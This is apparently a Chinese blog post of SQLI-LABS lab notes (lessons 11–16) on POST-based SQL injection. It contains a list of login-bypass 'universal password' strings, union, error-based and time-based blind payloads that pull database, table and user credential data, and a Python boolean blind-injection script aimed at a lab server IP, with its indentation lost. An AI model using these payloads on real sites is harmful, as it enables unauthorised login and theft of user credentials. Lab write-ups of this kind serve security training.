写在前面:今天介绍的是post注入。

自己总结了一些万能密码:

1:”or “a”=”a
2: ‘)or(‘a’=’a
3:or 1=1–
4:’or 1=1–
5:a’or’ 1=1–
6:”or 1=1–
7:’or’a’=’a
8:”or”=”a’=’a
9:’or”=’
10:’or’=’or’
11:1 or ‘1’=’1’=1
12:1 or ‘1’=’1′ or 1=1
13: ‘OR 1=1%00

#然而个人习惯性使用
admin’#
admin’)#
admin”#
admin”)#
admin’or’1’=’1#
#等等来构造恒真语句(密码随便输)

less-11

1.使用万能密码注入

用户名:admin’#
密码随便输。(之后都是随便输,我后面就只说用户名输什么了)
显示用admin账户登录,表明可以注入

2.猜字段

uname=123&passwd=q%27order by 2%23&submit=Submit

字段数为2

3.爆数据库

用户名输入:

1admin’union select 1,database()#

爆出数据库为security

3.爆表

uname=123&passwd=q%27union select 1,group_concat(table_name) from information_schema.tables where table_schema=’security’%23&submit=Submit

爆出表emails,referers,uagents,users

或者

uname=1admin’union select 1,group_concat(table_name) from information_schema.tables where table_schema=’security’%23&passwd=1&submit=Submit

ps:这里遇到一个坑,在post传参的时候#是不能用–+代替的,最好使用%23

4.爆列

uname=1admin’union select 1,group_concat(column_name) from information_schema.columns where table_schema=’security’ and table_name=’users’%23&passwd=1&submit=Submit

列名:id,username,password

5.爆数据

uname=abc’union select 1,concat_ws(char(32,58,32),id,username,password) from users limit 1,1%23&passwd=1&submit=Submit

#或者

uname=1admin’union select password,username from users where id=2%23&passwd=1&submit=Submit

#或者一次性爆出所有信息

uname=abc’union select group_concat(username),group_concat(password) from users limit 1,1%23&passwd=1&submit=Submit

less-11 over!

less-12

按照less-11的payload,单引号换双引号试一下,发现报错

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘union select group_concat(username),group_concat(password) from users#”) and pas’ at line 1

那就是少了个),换”)即可

less-12 over!

less-13

尝试注入点

admin’

发现报错

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘1’) LIMIT 0,1′ at line 1

说明闭合还差个括号

尝试admin’)#注入

分析一下:不会显示你的登录信息了,只能给你一个是否登录成功的返回数据。那我们这里可以用下布尔类型的盲注。

布尔型盲注我在我前面的文章《SQLI-LABS修炼笔记(二)》已经细讲过了,可以看看。

直接上脚本爆数据库:

#!/usr/bin/python
# -*- coding: utf-8 -*-

import requests
#uname=’ )or (select substr((select database()),1,1))=’s’ # &passwd=1
url = “http://43.247.91.228:84/Less-13/”;
name =””
database_length=0
#正确的话就存在 flag.jpg
database_length_payload = “uname=’ ) or length((select database()))={0} #”
database_name_payload = “uname=’ )or (select substr((select database()),{0},1))='{1}’ # &passwd=1”
def get_response(payload,value,*args):
if len(args)==0:
payload=payload.format(value)
data = {‘uname’: payload, ‘passwd’: ‘1’}
else:
payload = payload.format(value,args[0])
data = {‘uname’: payload, ‘passwd’: ‘1’}
print(data)
html = requests.post(url, data=data)
if “flag.jpg” in html.text:
return True
else:
return False
for n in range(100):
if get_response(database_length_payload,n):
print(“[+] database_length is {0}”.format(n) )
database_length=n
break
for nn in range(1,database_length+1):
for v in “qwertyuioplkjhgfdsazxcvbnm”:
if get_response(database_name_payload,nn,v):
name =name+v
print(“[+] database name is {0}”.format(name))
break
print(“[*] database name is {0}”.format(name))

也可以使用双注入!双注入我之前的文章《SQLI-LABS修炼笔记(二)》里面也写了,这里直接上payload

uname=1&passwd=1′)union select count(*),concat(‘:’,(select concat(username,char(32,44,32),password) from users limit 0,1),’:’,floor(rand(0)*2)) as a from information_schema.tables group by a%23

less-13 over!

less-14

测试注入点

admin’

没有回显,再测试

admin”

发现报错回显

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘”admin”” and password=”” LIMIT 0,1’ at line 1

按照less-13的payload,把’)换成”就行。

less-14 over!

less-15

怎么测试都找不到报错回显,那应该是基于时间的盲注了。

测试一下

uname=admin’and If(ascii(substr(database(),1,1))=115,1,sleep(5))#&passwd=11&submit=Submit

正确的时候可以直接登录,不正确的时候延时5秒。

试一下果然是基于时间的盲注。

脚本跑一下,爆出信息。

less-15 over!

less-16

这题很迷,卡了n久,后来发现就是基于时间的盲注。

less-15的脚本单引号换双引号就行。

less-16 over!

分类: WEB学习

0 条评论

发表评论

电子邮件地址不会被公开。 必填项已用*标注